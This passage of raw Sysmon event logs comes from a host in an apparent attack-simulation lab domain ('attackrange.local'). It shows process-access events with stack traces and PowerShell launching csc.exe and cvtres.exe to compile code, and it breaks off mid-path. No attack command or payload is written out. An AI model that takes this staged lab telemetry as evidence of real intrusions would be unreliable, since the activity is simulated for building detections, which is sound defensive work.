13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003825Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003824Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003823Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003822Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003821Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003820Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003819Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003818Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003817Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8585-5FCF-BF00-000000009101}656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003816Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8585-5FCF-BE00-000000009101}41445068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-8585-5FCF-BF00-000000009101}656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003815Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.520{10ACEC4A-8585-5FCF-BF00-000000009101}656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES2A08.tmp" "c:\Users\Administrator\AppData\Local\Temp\342h1cqk\CSCEB8DD02B68304287BD6296B8364CAC97.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-8585-5FCF-BE00-000000009101}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\342h1cqk\342h1cqk.cmdline" 10341000x80000000000000003814Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8585-5FCF-BE00-000000009101}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003813Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003812Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003811Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003810Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003809Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003808Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003807Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003806Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003804Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8585-5FCF-BE00-000000009101}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003803Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8584-5FCF-BD00-000000009101}19284748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8585-5FCF-BE00-000000009101}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b37347(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.303